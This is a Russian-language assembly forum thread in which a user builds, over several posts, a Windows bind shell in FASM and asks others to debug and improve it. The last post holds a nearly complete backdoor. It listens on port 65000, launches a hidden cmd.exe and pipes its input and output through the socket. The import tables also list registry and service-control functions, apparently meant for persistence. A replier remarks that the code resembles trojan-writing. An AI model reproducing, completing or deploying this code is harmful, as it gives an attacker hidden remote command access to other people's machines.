Вот начал изучать сетевые сокеты Windows , у меня вопрос больше по синтаксису fasm'a щас , не хочет подцепляца макрос sizeof а мне нада передать размер структуры функции: Error: undefined symbol 'sizeof'. Instruction: pushd sizeof sock хотя макросы в инклюдах подключены Код (Text): format PE GUI 4.0 entry Main include 'win32a.inc' section '.data' data readable writeable wsadata WSADATA sock sockaddr_in hsocket dd ? my_socket dw 65535d ErrorCode db 260 dup(?) Fmt db '%x',0 section '.code' code readable executable proc Main invoke WSAStartup,0202h,wsadata invoke socket, AF_INET,SOCK_STREAM,0 mov [hsocket],eax mov [sock.sin_family],AF_INET mov [sock.sin_addr],0 push [my_socket] pop [sock.sin_port] invoke bind,[hsocket],sock,sizeof sock invoke WSACleanup invoke ExitProcess,0 endp proc LastError invoke GetLastError cinvoke wsprintfA,ErrorCode,Fmt,0 invoke MessageBoxA,0,ErrorCode,0,MB_ICONERROR ret endp section '.idata' import data readable library kernel,'KERNEL32.DLL',\ user,'USER32.DLL',\ advapi,'ADVAPI32.DLL',\ Ws2_32,'Ws2_32.dll' import advapi,\ RegOpenKeyExA,'RegOpenKeyExA',\ RegSetValueExA,'RegSetValueExA',\ RegCloseKey,'RegCloseKey' import kernel,\ ExitProcess,'ExitProcess',\ GetLastError,'GetLastError',\ lstrlenA,'lstrlenA' import user,\ MessageBoxA,'MessageBoxA',\ wsprintfA,'wsprintfA' import Ws2_32,\ WSAStartup,'WSAStartup',\ socket,'socket',\ WSACleanup,'WSACleanup' Вот на этом месте компилятор пишет ошибку invoke bind,[hsocket],sock,sizeof sock
Ответы на любой из ваших вопросов есть в MSDN и хелпах по компиляторам. Переводите хотябы гуглом если с буржуйским совсем туго. Не мое дело конечно,но так и WASM.BEGINNERS скоро не хватит.
Пишу bind shell на fasm. Вот на чем застрял не пойму что такое FIONBIO (это один из аргументов функции ioctlsocket) , если это константа то чему она равна или это что-то другое ? И еще как инициализировать локальные переменные на fasm? Код (Text): format PE GUI 4.0 entry Main include 'win32a.inc' SOMAXCONN = 7fffffffh INVALID_SOCKET = -1h section '.data' data readable writeable wsadata WSADATA sock sockaddr_in hsocket dd ? dwMode dd ? my_socket dw 65000d ErrorCode db 260 dup(?) Fmt db '%x',0 section '.code' code readable executable proc Main call Shell invoke WSACleanup invoke ExitProcess,0 endp proc BindCmd ret endp proc Shell invoke WSAStartup,0202h,wsadata invoke socket,AF_INET,SOCK_STREAM, 0 mov [hsocket],eax mov [sock.sin_family],AF_INET mov [sock.sin_addr],0 mov ax,[my_socket] xchg ah,al mov [sock.sin_port],ax invoke bind,[hsocket],sock,sizeof.sockaddr_in mov dwMode,1 invoke ioctlsocket,[hsocket],FIONBIO,dwMode invoke listen,[hsocket],SOMAXCONN @@: invoke accept,[hsocket],sock,0 cmp eax,INVALID_SOCKET je .ret mov edx,eax invoke CreateThread,0,0,BindCmd,edx,0,0 invoke CloseHandle,eax .ret: invoke Sleep, 1000 jmp @B ret endp proc LastError invoke GetLastError cinvoke wsprintfA,ErrorCode,Fmt,0 invoke MessageBoxA,0,ErrorCode,0,MB_ICONERROR ret endp section '.idata' import data readable library kernel,'KERNEL32.DLL',\ user,'USER32.DLL',\ advapi,'ADVAPI32.DLL',\ Ws2_32,'Ws2_32.dll' import advapi,\ RegOpenKeyExA,'RegOpenKeyExA',\ RegSetValueExA,'RegSetValueExA',\ RegCloseKey,'RegCloseKey',\ OpenSCManagerA,'OpenSCManagerA',\ OpenServiceA,'OpenServiceA',\ ChangeServiceConfigA,'ChangeServiceConfigA',\ CloseServiceHandle,'CloseServiceHandle' import kernel,\ ExitProcess,'ExitProcess',\ GetLastError,'GetLastError',\ lstrlenA,'lstrlenA',\ GetModuleFileNameA,'GetModuleFileNameA',\ lstrcatA,'lstrcatA',\ lstrcpyA,'lstrcpyA',\ CreateThread,'CreateThread',\ CloseHandle,'CloseHandle',\ Sleep,'Sleep' import user,\ MessageBoxA,'MessageBoxA',\ wsprintfA,'wsprintfA' import Ws2_32,\ WSAStartup,'WSAStartup',\ socket,'socket',\ WSACleanup,'WSACleanup',\ bind,'bind',\ listen,'listen',\ accept,'accept'
варианты использования (или): - установить sdk и переносить, что нужно на fasm когда требуется - выкинуть fasm, установить c и sdk и ничего не переносить - пить яд
Ну ёк-макарёк , как инициализировать данные эти на fasm , там пример из хэндла си же , он мне не понятен. Помогите мне пожалуйста каму несложно. И как выделить место под локальный буффер ?
Ну что же вы так упорно не хотите читать документацию? В пакете MASM32 например есть папочка help. Там можно найти и как память выделить и не только. Пишите по а)Документации б)Книгам в)Статьям. Есть 2 варианта: а)Отказаться от копипаста. б)Отказаться от программирования(тем более всяких троянов). Выбор за вами! Выделяйте через VirtualAllocEx.
Инициализирую локальные переменные но программа отказываеца собираца , пигшет ошибки Код (Text): format PE GUI 4.0 entry Main include 'win32a.inc' SOMAXCONN = 7fffffffh INVALID_SOCKET = -1h section '.data' data readable writeable mysocket dw 65000d szCommandLine db "cmd.exe",0 ErrorCode db 260 dup(?) Fmt db '%x',0 struct SECURITY_ATTRIBUTES nLength dd ? lpSecurityDescriptor dd ? bInheritHandle dd ? ends sat SECURITY_ATTRIBUTES startupinfo STARTUPINFO wsadata WSADATA sock sockaddr_in processinfo PROCESS_INFORMATION section '.code' code readable executable proc Main call Shell invoke WSACleanup invoke ExitProcess,0 endp proc BindCmd locals hiRead dd ? hoRead dd ? hiWrite dd ? hoWrite dd ? endl mov [sat.nLength],sizeof.SECURITY_ATTRIBUTES mov [sat.lpSecurityDescriptor],00h mov [sat.bInheritHandle],01h invoke CreatePipe,hiRead,hiWrite,sat,00h invoke CreatePipe,hoRead,hoWrite,sat,00h invoke GetStartupInfoA,startupinfo mov [startupinfo.cb],sizeof.STARTUPINFO mov eax,[hoWrite] mov [startupinfo.hStdOutput],eax mov [startupinfo.hStdError],eax mov eax,[hiRead] mov [startupinfo.hStdInput],eax mov [startupinfo.dwFlags],STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES mov [startupinfo.wShowWindow],SW_HIDE invoke CreateProcessA,0,szCommandLine,0,0,TRUE,CREATE_NEW_CONSOLE,0,0,startupinfo,processinfo invoke CloseHandle,[hoWrite] invoke CloseHandle,[hiRead] endp proc Shell locals hsocket dd ? dwMode dd ? endl invoke WSAStartup,0202h,wsadata invoke socket,AF_INET,SOCK_STREAM, 0 mov [hsocket],eax mov [sock.sin_family],AF_INET mov [sock.sin_addr],0 mov ax,[mysocket] xchg ah,al mov [sock.sin_port],ax invoke bind,[hsocket],sock,sizeof.sockaddr_in mov [dwMode],0001h invoke ioctlsocket,[hsocket],1,[dwMode] invoke listen,[hsocket],SOMAXCONN @@: invoke accept,[hsocket],sock,0 cmp eax,INVALID_SOCKET je .ret mov edx,eax invoke CreateThread,0,0,BindCmd,edx,0,0 invoke CloseHandle,eax .ret: invoke Sleep, 1000 jmp @B ret endp proc LastError invoke GetLastError cinvoke wsprintfA,ErrorCode,Fmt,0 invoke MessageBoxA,0,ErrorCode,0,MB_ICONERROR ret endp section '.idata' import data readable library kernel,'KERNEL32.DLL',\ user,'USER32.DLL',\ advapi,'ADVAPI32.DLL',\ Ws2_32,'Ws2_32.dll' import advapi,\ RegOpenKeyExA,'RegOpenKeyExA',\ RegSetValueExA,'RegSetValueExA',\ RegCloseKey,'RegCloseKey',\ OpenSCManagerA,'OpenSCManagerA',\ OpenServiceA,'OpenServiceA',\ ChangeServiceConfigA,'ChangeServiceConfigA',\ CloseServiceHandle,'CloseServiceHandle' import kernel,\ ExitProcess,'ExitProcess',\ GetLastError,'GetLastError',\ lstrlenA,'lstrlenA',\ GetModuleFileNameA,'GetModuleFileNameA',\ lstrcatA,'lstrcatA',\ lstrcpyA,'lstrcpyA',\ CreateThread,'CreateThread',\ CloseHandle,'CloseHandle',\ Sleep,'Sleep',\ CreatePipe,'CreatePipe',\ GetStartupInfoA,'GetStartupInfoA',\ CreateProcessA,'CreateProcessA' import user,\ MessageBoxA,'MessageBoxA',\ wsprintfA,'wsprintfA' import Ws2_32,\ WSAStartup,'WSAStartup',\ socket,'socket',\ WSACleanup,'WSACleanup',\ bind,'bind',\ listen,'listen',\ accept,'accept',\ ioctlsocket,'ioctlsocket'
В фасме чтобы получить адресс переменной необходимо написать только имя Сам знаешь адрес переменной, когда она локальная, то есть будет лежать где-то в стеке? Нет. Компилятор тоже. Код (Text): locals hiRead dd ? ; Эти переменные в твоей программе не могут быть локальными. hoRead dd ? hiWrite dd ? hoWrite dd ? endl mov [sat.nLength],sizeof.SECURITY_ATTRIBUTES mov [sat.lpSecurityDescriptor],00h mov [sat.bInheritHandle],01h invoke CreatePipe,hiRead,hiWrite,sat,00h invoke CreatePipe,hoRead,hoWrite,sat,00h
Спасибо. А почему моя программа не шлет в сокет приветственное сообщение ? Код (Text): format PE GUI 4.0 entry Main include 'win32a.inc' SOMAXCONN = 7fffffffh INVALID_SOCKET = -1h section '.data' data readable writeable hsocket dd ? dwMode dd ? hiRead dd ? hoRead dd ? hiWrite dd ? hoWrite dd ? mysocket dw 65000d szCommandLine db 'cmd.exe',0 szBanner db 'Welcome fragment!',13,10,0 ErrorCode db 260 dup(?) Fmt db '%08Xh',0 struct SECURITY_ATTRIBUTES nLength dd ? lpSecurityDescriptor dd ? bInheritHandle dd ? ends sat SECURITY_ATTRIBUTES startupinfo STARTUPINFO wsadata WSADATA sock sockaddr_in processinfo PROCESS_INFORMATION section '.code' code readable executable proc Main call Shell invoke WSACleanup invoke ExitProcess,0 endp proc BindCmd mov [sat.nLength],sizeof.SECURITY_ATTRIBUTES mov [sat.lpSecurityDescriptor],00h mov [sat.bInheritHandle],01h invoke CreatePipe,hiRead,hiWrite,sat,00h invoke CreatePipe,hoRead,hoWrite,sat,00h invoke GetStartupInfoA,startupinfo mov [startupinfo.cb],sizeof.STARTUPINFO mov eax,[hoWrite] mov [startupinfo.hStdOutput],eax mov [startupinfo.hStdError],eax mov eax,[hiRead] mov [startupinfo.hStdInput],eax mov [startupinfo.dwFlags],STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES mov [startupinfo.wShowWindow],SW_HIDE invoke CreateProcessA,0,szCommandLine,0,0,TRUE,CREATE_NEW_CONSOLE,0,0,startupinfo,processinfo invoke CloseHandle,[hoWrite] invoke CloseHandle,[hiRead] invoke lstrlenA,szBanner invoke send,[hsocket],szBanner,eax,0 call LastError ret endp proc Shell invoke WSAStartup,0202h,wsadata invoke socket,AF_INET,SOCK_STREAM, 0 mov [hsocket],eax mov [sock.sin_family],AF_INET mov [sock.sin_addr],0 mov ax,[mysocket] xchg ah,al mov [sock.sin_port],ax invoke bind,[hsocket],sock,sizeof.sockaddr_in invoke listen,[hsocket],SOMAXCONN @@: invoke accept,[hsocket],sock,0 cmp eax,INVALID_SOCKET je .ret mov edx,eax invoke CreateThread,0,0,BindCmd,edx,0,0 invoke CloseHandle,eax .ret: invoke Sleep, 1000 jmp @B ret endp proc LastError invoke GetLastError cinvoke wsprintfA,ErrorCode,Fmt,eax invoke MessageBoxA,0,ErrorCode,0,MB_ICONERROR ret endp section '.idata' import data readable library kernel,'KERNEL32.DLL',\ user,'USER32.DLL',\ advapi,'ADVAPI32.DLL',\ Ws2_32,'Ws2_32.dll' import advapi,\ RegOpenKeyExA,'RegOpenKeyExA',\ RegSetValueExA,'RegSetValueExA',\ RegCloseKey,'RegCloseKey',\ OpenSCManagerA,'OpenSCManagerA',\ OpenServiceA,'OpenServiceA',\ ChangeServiceConfigA,'ChangeServiceConfigA',\ CloseServiceHandle,'CloseServiceHandle' import kernel,\ ExitProcess,'ExitProcess',\ GetLastError,'GetLastError',\ lstrlenA,'lstrlenA',\ GetModuleFileNameA,'GetModuleFileNameA',\ lstrcatA,'lstrcatA',\ lstrcpyA,'lstrcpyA',\ CreateThread,'CreateThread',\ CloseHandle,'CloseHandle',\ Sleep,'Sleep',\ CreatePipe,'CreatePipe',\ GetStartupInfoA,'GetStartupInfoA',\ CreateProcessA,'CreateProcessA' import user,\ MessageBoxA,'MessageBoxA',\ wsprintfA,'wsprintfA' import Ws2_32,\ WSAStartup,'WSAStartup',\ socket,'socket',\ WSACleanup,'WSACleanup',\ bind,'bind',\ listen,'listen',\ accept,'accept',\ ioctlsocket,'ioctlsocket',\ send,'send' GetLastError возвращает 00002749h WSAENOTCONN 10057 (0x2749) A request to send or receive data was disallowed because the socket is not connected and (when sending on a datagram socket using a sendto call) no address was supplied.
Помогите установить ошибку, я думаю она находится гдето после макроса .while Код (Text): format PE GUI 4.0 entry Main include 'win32ax.inc' SOMAXCONN = 7fffffffh INVALID_SOCKET = -1h FIONBIO = 8004667Eh STILL_ACTIVE = 00000103h SOCKET_ERROR = -1 WSAEWOULDBLOCK = 10035d macro .break { jmp __ENDW } macro .continue { jmp __WHILE } section '.data' data readable writeable hsocket dd ? iMode dd ? bytes dd ? hiRead dd ? hoRead dd ? exitcode dd ? buffer db 1024 dup(?) available dd ? hiWrite dd ? hoWrite dd ? mysocket dw 65000d szCommandLine db 'cmd.exe',0 szBanner db 'Welcome fragment!',13,10,0 ErrorCode db 260 dup(?) Fmt db '%08Xh',0 struct SECURITY_ATTRIBUTES nLength dd ? lpSecurityDescriptor dd ? bInheritHandle dd ? ends sat SECURITY_ATTRIBUTES startupinfo STARTUPINFO wsadata WSADATA sock sockaddr_in processinfo PROCESS_INFORMATION section '.code' code readable executable proc Main call Shell invoke WSACleanup invoke ExitProcess,0 endp proc BindCmd client:dword mov [sat.nLength],sizeof.SECURITY_ATTRIBUTES mov [sat.lpSecurityDescriptor],00h mov [sat.bInheritHandle],01h invoke CreatePipe,hiRead,hiWrite,sat,00h invoke CreatePipe,hoRead,hoWrite,sat,00h invoke GetStartupInfoA,startupinfo mov [startupinfo.cb],sizeof.STARTUPINFO mov eax,[hoWrite] mov [startupinfo.hStdOutput],eax mov [startupinfo.hStdError],eax mov eax,[hiRead] mov [startupinfo.hStdInput],eax mov [startupinfo.dwFlags],STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES mov [startupinfo.wShowWindow],SW_HIDE invoke CreateProcessA,0,szCommandLine,0,0,TRUE,CREATE_NEW_CONSOLE,0,0,startupinfo,processinfo invoke CloseHandle,[hoWrite] invoke CloseHandle,[hiRead] mov [bytes],1 invoke ioctlsocket,[hsocket],FIONBIO,bytes invoke lstrlenA,szBanner invoke send,[client],szBanner,eax,0 .while TRUE invoke Sleep,1 invoke GetExitCodeProcess,[processinfo.hProcess],exitcode .if [exitcode] <> STILL_ACTIVE .break .endif invoke PeekNamedPipe,[hoRead],buffer,1024,bytes,available,0 .if [bytes] <> 0 .if [available] > 1024 .while [bytes] >= 1024 invoke Sleep,1 invoke ReadFile,[hoRead],buffer,1024,bytes, 0 .if [bytes] <> 0 invoke send,[client],buffer,bytes,0 .endif .endw .else invoke ReadFile,[hoRead],buffer,1024,bytes,0 .if [bytes] <> 0 invoke send,[client],buffer,bytes,0 .endif .endif .endif @@: invoke recv,[client],buffer,1024,0 .if eax = SOCKET_ERROR | eax = 0 invoke WSAGetLastError .if eax = WSAEWOULDBLOCK .continue .else invoke TerminateProcess,[processinfo.hProcess],0 .break .endif .else mov edx,eax invoke WriteFile,[hiWrite],buffer,edx,bytes, 0 .endif .endw invoke CloseHandle,[hiWrite] invoke CloseHandle,[hoRead] invoke closesocket,[client] ret endp proc Shell lpParam invoke WSAStartup,0202h,wsadata invoke socket,AF_INET,SOCK_STREAM, 0 mov [hsocket],eax mov [sock.sin_family],AF_INET mov [sock.sin_addr],0 mov ax,[mysocket] xchg ah,al mov [sock.sin_port],ax invoke bind,[hsocket],sock,sizeof.sockaddr_in mov [iMode],1 invoke ioctlsocket,[hsocket],FIONBIO,iMode invoke listen,[hsocket],SOMAXCONN @@: invoke accept,[hsocket],sock,0 cmp eax,INVALID_SOCKET je .ret mov edx,eax invoke CreateThread,0,0,BindCmd,edx,0,0 invoke CloseHandle,eax .ret: invoke Sleep, 1000 jmp @B ret endp proc LastError invoke GetLastError cinvoke wsprintfA,ErrorCode,Fmt,eax invoke MessageBoxA,0,ErrorCode,0,MB_ICONERROR ret endp section '.idata' import data readable library kernel,'KERNEL32.DLL',\ user,'USER32.DLL',\ advapi,'ADVAPI32.DLL',\ Ws2_32,'Ws2_32.dll' import advapi,\ RegOpenKeyExA,'RegOpenKeyExA',\ RegSetValueExA,'RegSetValueExA',\ RegCloseKey,'RegCloseKey',\ OpenSCManagerA,'OpenSCManagerA',\ OpenServiceA,'OpenServiceA',\ ChangeServiceConfigA,'ChangeServiceConfigA',\ CloseServiceHandle,'CloseServiceHandle' import kernel,\ ExitProcess,'ExitProcess',\ GetLastError,'GetLastError',\ lstrlenA,'lstrlenA',\ GetModuleFileNameA,'GetModuleFileNameA',\ lstrcatA,'lstrcatA',\ lstrcpyA,'lstrcpyA',\ CreateThread,'CreateThread',\ CloseHandle,'CloseHandle',\ Sleep,'Sleep',\ CreatePipe,'CreatePipe',\ GetStartupInfoA,'GetStartupInfoA',\ CreateProcessA,'CreateProcessA',\ GetExitCodeProcess,'GetExitCodeProcess',\ PeekNamedPipe,'PeekNamedPipe',\ ReadFile,'ReadFile',\ TerminateProcess,'TerminateProcess',\ WriteFile,'WriteFile' import user,\ MessageBoxA,'MessageBoxA',\ wsprintfA,'wsprintfA' import Ws2_32,\ WSAStartup,'WSAStartup',\ socket,'socket',\ WSACleanup,'WSACleanup',\ bind,'bind',\ listen,'listen',\ accept,'accept',\ ioctlsocket,'ioctlsocket',\ send,'send',\ recv,'recv',\ WSAGetLastError,'WSAGetLastError',\ closesocket,'closesocket'
Вот код Bind shell cmd.exe на fasm. Подскажите пожалуйста, с cmd.exe он работает нормально а вот powershell не хочет, почему ? И почему он не завершает процесс когда из выходишь из шелла , можно что нибудь с этим зделать ? Помогите оптимизировать и доработать код пожалуйста. Код (Text): format PE GUI 4.0 entry Main include 'win32ax.inc' SOMAXCONN = 7fffffffh INVALID_SOCKET = -1h FIONBIO = 8004667Eh STILL_ACTIVE = 00000103h SOCKET_ERROR = -1 WSAEWOULDBLOCK = 10035d macro .break { jmp __ENDW } macro .continue { jmp __WHILE } section '.data' data readable writeable mysocket dw 65000d szCommandLine db 'cmd.exe',0 szBanner db 'Welcome fragment!',13,10,0 struct SECURITY_ATTRIBUTES nLength dd ? lpSecurityDescriptor dd ? bInheritHandle dd ? ends sat SECURITY_ATTRIBUTES startupinfo STARTUPINFO wsadata WSADATA sock sockaddr_in processinfo PROCESS_INFORMATION section '.code' code readable executable proc Main call Shell invoke WSACleanup invoke ExitProcess,0 endp proc BindCmd client:dword locals bytes dd ? hiRead dd ? hoRead dd ? exitcode dd ? buffer db 1024 dup(?) available dd ? hiWrite dd ? hoWrite dd ? endl mov [sat.nLength],sizeof.SECURITY_ATTRIBUTES mov [sat.lpSecurityDescriptor],00h mov [sat.bInheritHandle],01h invoke CreatePipe,addr hiRead,addr hiWrite,sat,00h invoke CreatePipe,addr hoRead,addr hoWrite,sat,00h invoke GetStartupInfoA,startupinfo mov [startupinfo.cb],sizeof.STARTUPINFO mov eax,[hoWrite] mov [startupinfo.hStdOutput],eax mov [startupinfo.hStdError],eax mov eax,[hiRead] mov [startupinfo.hStdInput],eax mov [startupinfo.dwFlags],STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES mov [startupinfo.wShowWindow],SW_HIDE invoke CreateProcessA,0,szCommandLine,0,0,TRUE,CREATE_NEW_CONSOLE,0,0,startupinfo,processinfo invoke CloseHandle,[hoWrite] invoke CloseHandle,[hiRead] mov [bytes],1 invoke ioctlsocket,[client],FIONBIO,addr bytes invoke lstrlenA,szBanner invoke send,[client],szBanner,eax,0 .while TRUE invoke Sleep,1 invoke GetExitCodeProcess,[processinfo.hProcess],addr exitcode .if [exitcode] <> STILL_ACTIVE .break .endif invoke PeekNamedPipe,[hoRead],addr buffer,1024,addr bytes,addr available,0 .if [bytes] <> 0 .if [available] > 1024 .while [bytes] >= 1024 invoke Sleep,1 invoke ReadFile,[hoRead],addr buffer,1024,addr bytes, 0 .if [bytes] <> 0 invoke send,[client],addr buffer,[bytes],0 .endif .endw .else invoke ReadFile,[hoRead],addr buffer,1024,addr bytes,0 .if [bytes] <> 0 invoke send,[client],addr buffer,[bytes],0 .endif .endif .endif @@: invoke recv,[client],addr buffer,1024,0 .if eax = SOCKET_ERROR | eax = 0 invoke WSAGetLastError .if eax = WSAEWOULDBLOCK .continue .else invoke TerminateProcess,[processinfo.hProcess],0 .break .endif .else mov ecx,eax invoke WriteFile,[hiWrite],addr buffer,ecx,addr bytes, 0 .endif .endw invoke CloseHandle,[hiWrite] invoke CloseHandle,[hoRead] invoke closesocket,[client] ret endp proc Shell lpParam locals hsocket dd ? iMode dd ? endl invoke WSAStartup,0202h,wsadata invoke socket,AF_INET,SOCK_STREAM, 0 mov [hsocket],eax mov [sock.sin_family],AF_INET mov [sock.sin_addr],0 mov ax,[mysocket] xchg ah,al mov [sock.sin_port],ax invoke bind,[hsocket],sock,sizeof.sockaddr_in mov [iMode],1 invoke ioctlsocket,[hsocket],FIONBIO,addr iMode invoke listen,[hsocket],SOMAXCONN @@: invoke accept,[hsocket],sock,0 cmp eax,INVALID_SOCKET je .ret mov edx,eax invoke CreateThread,0,0,BindCmd,edx,0,0 invoke CloseHandle,eax .ret: invoke Sleep, 1000 jmp @B ret endp section '.idata' import data readable library kernel,'KERNEL32.DLL',\ user,'USER32.DLL',\ advapi,'ADVAPI32.DLL',\ Ws2_32,'Ws2_32.dll' import advapi,\ RegOpenKeyExA,'RegOpenKeyExA',\ RegSetValueExA,'RegSetValueExA',\ RegCloseKey,'RegCloseKey',\ OpenSCManagerA,'OpenSCManagerA',\ OpenServiceA,'OpenServiceA',\ ChangeServiceConfigA,'ChangeServiceConfigA',\ CloseServiceHandle,'CloseServiceHandle' import kernel,\ ExitProcess,'ExitProcess',\ GetLastError,'GetLastError',\ lstrlenA,'lstrlenA',\ GetModuleFileNameA,'GetModuleFileNameA',\ lstrcatA,'lstrcatA',\ lstrcpyA,'lstrcpyA',\ CreateThread,'CreateThread',\ CloseHandle,'CloseHandle',\ Sleep,'Sleep',\ CreatePipe,'CreatePipe',\ GetStartupInfoA,'GetStartupInfoA',\ CreateProcessA,'CreateProcessA',\ GetExitCodeProcess,'GetExitCodeProcess',\ PeekNamedPipe,'PeekNamedPipe',\ ReadFile,'ReadFile',\ TerminateProcess,'TerminateProcess',\ WriteFile,'WriteFile' import user,\ MessageBoxA,'MessageBoxA',\ wsprintfA,'wsprintfA' import Ws2_32,\ WSAStartup,'WSAStartup',\ socket,'socket',\ WSACleanup,'WSACleanup',\ bind,'bind',\ listen,'listen',\ accept,'accept',\ ioctlsocket,'ioctlsocket',\ send,'send',\ recv,'recv',\ WSAGetLastError,'WSAGetLastError',\ closesocket,'closesocket'
